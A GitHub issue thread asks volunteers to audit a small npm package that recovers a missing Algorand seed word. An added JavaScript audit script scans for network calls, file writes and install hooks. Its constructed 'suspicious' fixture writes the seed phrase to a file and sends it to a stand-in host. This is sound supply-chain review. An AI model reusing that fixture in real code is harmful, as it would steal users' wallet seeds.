d13co/algorand-find-missing-seed-word

Calling soft auditors to vet v1.0.1 on npm

Opened this issue · 3 comments

d13co commented

Hi,

If you are well-versed enough in JavaScript to go through the code on NPM and confirm that it doesn't include anything nasty that could exfil a user's seed phrase, that would help a lot.

The package is intended to be fixed at version 1.0.1* (previously 1.0.0), so if you want to audit the code on npm, which is immutable, and drop a comment in this issue about it doing what it says on the tin/README, that would be appreciated by me and by skeptical potential users.

* 1.0.1 published after feedback below

d13co commented

Things to check:

.js files:

  • do not do network calls
  • do not save the seed phrase anywhere

package.json:

  • only imports the algosdk package
  • does not run any custom stuff like postinstall scripts

guanzo commented

For more immutability I would pin the algosdk version to 1.18.1 (remove the ^). That will avoid installing future malicious versions, however unlikely, but possible.
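The checklist in the second comment (no network calls, no persistence of the seed phrase, only algosdk as a dependency, no install scripts) plus the exact-version pin suggested above can be turned into a mechanical first pass over the published tarball. The script below is an added example written for this issue; it is not code from the algorand-find-missing-seed-word package. The package.json and index.js contents it scans are constructed stand-ins (one clean, one deliberately bad), not the real package, and the function names (`auditPackage`, `scanSource`, `checkManifest`) are this example's own.

```javascript
// Added example: a static checklist runner for an npm package's files.
// Implements the thread's checks: (1) no network calls in .js files,
// (2) no writing of the seed phrase anywhere, (3) only allowed dependencies,
// (4) no install-time scripts, and (5) dependencies pinned to an exact version.

// Coarse indicators of outbound network access in Node or browser code.
// A regex scan catches plain require() and global API use, not obfuscated
// or dynamically built names, so it narrows the manual review, not replaces it.
const NETWORK_PATTERNS = [
  /require\(\s*['"](?:node:)?(?:http|https|net|dgram|tls|dns|child_process)['"]\s*\)/,
  /\bfetch\s*\(/,
  /\bXMLHttpRequest\b/,
  /\bWebSocket\b/,
  /\bnavigator\.sendBeacon\b/,
];

// Coarse indicators that data (such as a recovered mnemonic) is persisted.
const PERSIST_PATTERNS = [
  /require\(\s*['"](?:node:)?fs(?:\/promises)?['"]\s*\)/,
  /\bfs\.(?:write|append)File(?:Sync)?\s*\(/,
  /\blocalStorage\b|\bsessionStorage\b|\bindexedDB\b/,
  /\bdocument\.cookie\b/,
];

// Lifecycle scripts npm runs on install; any of these is a finding.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Exact semver (optionally with a prerelease tag); rejects ^, ~, ranges, tags.
const EXACT_VERSION = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$/;

function scanSource(name, src) {
  const findings = [];
  for (const re of NETWORK_PATTERNS) {
    if (re.test(src)) findings.push(`${name}: possible network call, matches ${re}`);
  }
  for (const re of PERSIST_PATTERNS) {
    if (re.test(src)) findings.push(`${name}: possible persistence, matches ${re}`);
  }
  return findings;
}

function checkManifest(pkg, allowedDeps) {
  const findings = [];
  // devDependencies are not installed by consumers, so only runtime sets count.
  const deps = { ...(pkg.dependencies || {}), ...(pkg.optionalDependencies || {}) };
  for (const [dep, range] of Object.entries(deps)) {
    if (!allowedDeps.includes(dep)) findings.push(`package.json: unexpected dependency ${dep}`);
    if (!EXACT_VERSION.test(range)) findings.push(`package.json: ${dep} not pinned to an exact version (${range})`);
  }
  for (const hook of INSTALL_HOOKS) {
    if (pkg.scripts && hook in pkg.scripts) findings.push(`package.json: runs a ${hook} script: ${pkg.scripts[hook]}`);
  }
  return findings;
}

// files: { relativePath: contents } as extracted from the npm tarball.
// Returns a list of findings; an empty list means every check passed.
function auditPackage(files, allowedDeps) {
  const pkg = JSON.parse(files['package.json']);
  let findings = checkManifest(pkg, allowedDeps);
  for (const [name, src] of Object.entries(files)) {
    if (name.endsWith('.js')) findings = findings.concat(scanSource(name, src));
  }
  return findings;
}

// Constructed sample: what a clean package of this kind would look like.
const CLEAN_FILES = {
  'package.json': JSON.stringify({
    name: 'example-find-missing-word', version: '1.0.1', main: 'index.js',
    dependencies: { algosdk: '1.18.1' },
  }),
  'index.js': `const algosdk = require('algosdk');
// Try every wordlist entry in every position; keep the ones that form a valid mnemonic.
module.exports = function findMissingWord(words, wordlist) {
  const hits = [];
  for (let pos = 0; pos <= words.length; pos++) {
    for (const candidate of wordlist) {
      const attempt = [...words.slice(0, pos), candidate, ...words.slice(pos)].join(' ');
      try { algosdk.mnemonicToSecretKey(attempt); hits.push(attempt); } catch (e) {}
    }
  }
  return hits;
};`,
};

// Constructed sample: the shape of package the checklist is meant to catch.
const SUSPICIOUS_FILES = {
  'package.json': JSON.stringify({
    name: 'example-find-missing-word', version: '1.0.1', main: 'index.js',
    dependencies: { algosdk: '^1.18.1' },
    scripts: { postinstall: 'node setup.js', test: 'node test.js' },
  }),
  'index.js': `const https = require('https');
const fs = require('fs');
module.exports = function findMissingWord(words) {
  fs.writeFileSync('/tmp/seed.txt', words.join(' '));
  https.request({ host: 'example.invalid', method: 'POST' }).end(words.join(' '));
  return [];
};`,
};

module.exports = { auditPackage, scanSource, checkManifest, CLEAN_FILES, SUSPICIOUS_FILES };
```

To run it against the real artifact, fetch the tarball with `npm pack <package>@<version>`, extract it, and load each file into the `files` object with `fs.readFileSync`; audit the tarball rather than the GitHub tree, because the two are not guaranteed to match. A clean result from this scan is only a reason to proceed to reading the (short) source by hand, since string matching does not see through minification, string concatenation or `Function()` tricks.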

d13co commented

Fair enough - I didn't intend to change this but why not. 1.0.1 published with fixed algosdk.
If you think the code is benign please leave a comment to this effect.
Thanks!